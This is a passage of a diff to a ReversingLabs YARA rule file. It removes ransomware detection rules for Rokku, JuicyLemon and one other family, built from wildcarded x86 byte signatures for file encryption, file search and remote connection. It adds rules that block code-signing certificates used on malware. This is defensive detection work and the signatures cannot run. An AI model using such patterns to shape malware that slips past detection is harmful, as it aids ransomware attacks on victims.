-            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 56
-            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50
-            8D 84 24 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
-            ?? 51 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? FF 05 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 2B F0 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 03
-            C6 50 8D 8C 24 ?? ?? ?? ?? 51 8B D1 52 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? FF 05 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 55 E8 ?? ??
-            ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 56 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $search_and_encrypt_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "79:22:73:11:ac:dd:57:57:59:19:8d:bd:35:44:cc:a7" and 1478131200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Rokku : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_13Ae38C9Ae21A8576C0D024D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Rokku ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8722ed4a-b480-57ec-bba7-ce7d0f3704b9"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "416c5eb3-bc6d-5fb0-a7fe-58cdd6c7c39d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Rokku.yara#L1-L147"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15810-L15826"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fefb342f8a9afac3b40c343b830f334225ff4198d55504846aa855acf5dfc9ba"
+		logic_hash = "7be892eaf9e2e31442f7ef5ffd296dd17696d6c95d20eb2758ede2c553b05f38"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Rokku"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B E9 C7 44 24 ?? ?? ?? ?? ?? 33 DB 89 6C 24 ??
-            56 0F 57 C0 66 C7 44 24 ?? ?? ?? 57 66 0F 13 44 24 ?? B2 ?? 88 5C 24 ?? 8B CB 8A C1
-            02 C2 30 44 0C ?? 41 83 F9 ?? 73 ?? 8A 54 24 ?? EB ?? 8B CD 88 5C 24 ?? E8 ?? ?? ??
-            ?? 8D 54 24 ?? 8B C8 E8 ?? ?? ?? ?? 85 C0 75 ?? 40 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 51 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B D6 E8 ?? ?? ?? ?? 59 56 BE
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 4C 24 ?? 6A
-            ?? 8B D5 E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C1 8B 94 24 ?? ?? ?? ?? 0B C2 0F 84 ??
-            ?? ?? ?? 6A ?? 5D 3B D3 77 ?? 81 F9 ?? ?? ?? ?? 76 ?? 2B CD 1B D3 52 51 55 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C5 0F 85 ?? ?? ?? ?? 8B CD 8B C3 8A 90 ?? ?? ?? ?? 49
-            8A B0 ?? ?? ?? ?? 3A D6 75 ?? 40 85 C9 75 ?? 8B CB EB ?? 0F B6 C6 0F B6 CA 2B C8 85
-            C9 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 8B D6 50 B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 19 41 83 E8 ?? 75 ??
-            8B 6C 24 ?? 8B 7C 24 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 2B C7 1B CD 3B EB
-        }
-		$encrypt_files_p2 = {
-            7C ?? 7F ?? 81 FF ?? ?? ?? ?? 72 ?? 8B AC 24 ?? ?? ?? ?? 0F 57 C0 8B BC 24 ?? ?? ??
-            ?? 8B 4C 24 ?? 55 57 66 0F 13 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 59 59 8B 4C 24 ??
-            3B CB 77 ?? 3B C3 77 ?? 8B F3 EB ?? 3B CB 77 ?? 72 ?? 3D ?? ?? ?? ?? 72 ?? B8 ?? ??
-            ?? ?? 55 57 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 88 ?? ?? ?? ?? 74
-            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 56 50 8B D0 E8 ?? ?? ?? ?? 55 57 56 BA ?? ?? ?? ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? 99 03 F8 13 EA E9 ?? ??
-            ?? ?? 6A ?? 58 89 1D ?? ?? ?? ?? 83 E8 ?? 75 ?? 8B C7 89 1D ?? ?? ?? ?? 0B C5 BE ??
-            ?? ?? ?? 74 ?? 51 8D 54 24 ?? E8 ?? ?? ?? ?? 59 B9 ?? ?? ?? ?? 3B F1 74 ?? 56 51 BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 57 BD ?? ?? ?? ?? 8B D1 55 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 88 ?? ?? ?? ?? EB ?? BD ?? ?? ?? ?? 6A ?? 59 8B C1 BA ??
-            ?? ?? ?? C6 02 ?? 42 83 E8 ?? 75 ?? B8 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 6A ??
-            58 B9 ?? ?? ?? ?? C6 01 ?? 41 83 E8 ?? 75 ?? C6 06 ?? 46 83 ED ?? 75 ?? 6A ?? 8D 44
-            24 ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? B1 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 8B C3 30 4C 04 ?? 40 83 F8 ?? 73 ?? 8A 4C 24 ?? EB ?? 8B 4C 24 ?? 8D 54 24 ??
-            88 5C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B D6 E8 ??
-            ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 33 DB 43 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B C3 EB ?? 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p3 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 55 56 57 6A ?? 5E 56 BF ?? ?? ?? ?? 57 FF 15
-            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? BD ?? ?? ?? ?? 8B D3 8B CD E8 ?? ?? ?? ?? 59 56 57 FF
-            15 ?? ?? ?? ?? 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 C6 07 ?? 47
-            83 E8 ?? 75 ?? BF ?? ?? ?? ?? BA ?? ?? ?? ?? 53 8B CF E8 ?? ?? ?? ?? 59 6A ?? 58 C6
-            03 ?? 43 83 E8 ?? 75 ?? B9 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 3B E9 74 ?? 55 51 8B D6
-            E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50 51 8B D6 E8 ??
-            ?? ?? ?? 83 C4 ?? 6A ?? 5B 53 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? B9 ?? ??
-            ?? ?? 50 51 8B D3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ??
-            51 50 6A ?? 5A 8B C8 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74
-            ?? 50 51 8B D6 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3B C1 74 ?? 50
-            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6A ?? 5B 3B C1 74
-            ?? 50 51 8B D3 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3B C1 74 ?? 50
-            51 6A ?? 5A E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8B D7 50 8D 4C 24 ?? E8 ?? ?? ?? ??
-            59 BA ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 59 59 83 64 24 ?? ?? 83 EB ??
-            75 ?? 21 9C 24 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 59 C6 00 ?? 40 83 E9 ?? 75 ?? 8B C6 C6
-            45 ?? ?? 45 83 E8 ?? 75 ?? C6 07 ?? 47 83 EE ?? 75 ?? 33 C0 5F 40 5E 5D 5B 8B E5 5D
-            C3
-        }
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 8B F0 66 C7 45 ?? ?? ?? 33 DB 89 35
-            ?? ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
-            ?? 66 C7 45 ?? ?? ?? 02 C8 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? 88
-            5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D ??
-            32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ??
-            8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1
-            C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44
-            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
-            6A ?? 33 C9 C7 45 ?? ?? ?? ?? ?? 5B B0 ?? 88 5D ?? 32 C3 88 4D ?? 88 45 ?? 8B C1 C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 88 4D ?? 80 44 05 ?? ?? 40 83 F8 ?? 72 ?? 8B
-            0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 6A ?? 88 5D ?? B2 ?? 66 C7 45
-            ?? ?? ?? 33 C9 66 C7 45 ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 5B 8D
-            04 0A 30 44 0D ?? 41 3B CB 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 33 C9 C6 45 ?? ?? 58 34 ?? 88 4D ?? 88 45
-        }
-		$find_files_p2 = {
-            B2 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D 04 0A 30 44 0D
-            ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 80 F3 ?? C6 45 ?? ?? 88 5D ?? 8D 55 ??
-            33 DB C6 45 ?? ?? 50 88 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 59 59 6A ?? 58 34 ?? C6 45 ?? ?? 88 45 ?? B2 ?? 88 5D ?? 8B CB C7 45 ?? ?? ?? ??
-            ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ??
-            8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ??
-            8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 80 44 05 ?? ??
-            40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? B0 ?? C6 45
-            ?? ?? 34 ?? 88 5D ?? 59 88 45 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A
-            4D ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 0F 28 05
-            ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? 8A
-            45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ??
-            E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
-        }
-		$find_folders = {
-            55 8B EC 83 EC ?? 53 56 6A ?? 59 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 DB 8B F0 66
-            C7 45 ?? ?? ?? 89 35 ?? ?? ?? ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8D 45 ??
-            88 5D ?? 50 8D 55 ?? 8B CE E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? B0 ?? 59 B1 ?? 88 5D
-            ?? 32 C1 88 4D ?? 88 45 ?? 8B CB 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 66 C7 45 ?? ?? ?? 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45
-            ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45
-            ?? ?? ?? ?? ?? 88 45 ?? B2 ?? C7 45 ?? ?? ?? ?? ?? 8B CB 66 C7 45 ?? ?? ?? 88 5D ??
-            8D 04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50
-            8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 B1 ?? 88 5D ?? B0 ?? 88 4D ?? 32 C1 C7 45 ?? ??
-            ?? ?? ?? 88 45 ?? 8B C3 C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? 80 44 05 ??
-            ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59 66 C7
-            45 ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 80 44
-            05 ?? ?? 40 83 F8 ?? 72 ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D 55 ?? E8 ?? ?? ?? ?? 59
-            66 C7 45 ?? ?? ?? B1 ?? C7 45 ?? ?? ?? ?? ?? 8B C3 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8B 0D ?? ??
-            ?? ?? 8D 45 ?? 50 8D 55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 66 C7 45 ?? ?? ?? B2 ?? C7 45
-            ?? ?? ?? ?? ?? 8B CB C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8D
-            04 0A 30 44 0D ?? 41 83 F9 ?? 73 ?? 8A 55 ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 45 ?? 50 8D
-            55 ?? 88 5D ?? E8 ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_folders and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:ae:38:c9:ae:21:a8:57:6c:0d:02:4d" and 1475062802 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Juicylemon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_557B0Abf44045827F1F36Efbc96271Ec : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects JuicyLemon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "35e4bbd6-422b-562e-98fc-fe932270dbb8"
-		date = "2020-08-17"
-		modified = "2020-08-17"
+		id = "64db0b43-b73f-594d-9f04-2cdf76df7c9b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.JuicyLemon.yara#L1-L116"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15828-L15844"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "596d89843793307f4940dbb85b2e7081f02250f6adfdcd01f2d3c5f2b8b90875"
+		logic_hash = "633e8d6b44d62443d991738fa82b9742ac5634051bba5d0cdb3d6b35d66bdc8f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "JuicyLemon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B FA 8B F0 C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? FF 15 ?? ?? ?? ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 56 53 FF 15 ?? ?? ??
-            ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 8B F8 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? C6 45 ?? ?? 57 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? 8A 45 ?? 5F 5E 5B 59 59 5D C2
-        }
-		$remote_connection_2 = {
-            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 55 ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 66 BE ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 66 BE ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D6
-            59 E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files_and_encrypt = {
-            E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8
-            ?? ?? ?? ?? 46 4B 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 57
-            A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74
-            ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 80 C2 ?? E8
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 8B 00 FF
-            D0 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ??
-            ?? ?? ?? 8B D3 80 C2 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ??
-            ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 4B 80 FB ?? 0F 85 ?? ?? ?? ?? 57 A1 ?? ?? ??
-            ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1
-            ?? ?? ?? ?? 8B 00 FF D0 EB ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 46 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? ?? ?? ?? 57 A1 ??
-            ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
-            ?? ?? ?? 8B 00 FF D0 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ??
-            ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? A1 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            52 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 50 B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 59 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? C6 45 ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 8B
-            5D ?? 4B 85 DB 7C ?? 43 33 F6 80 7D ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
-            8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D
-            ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B
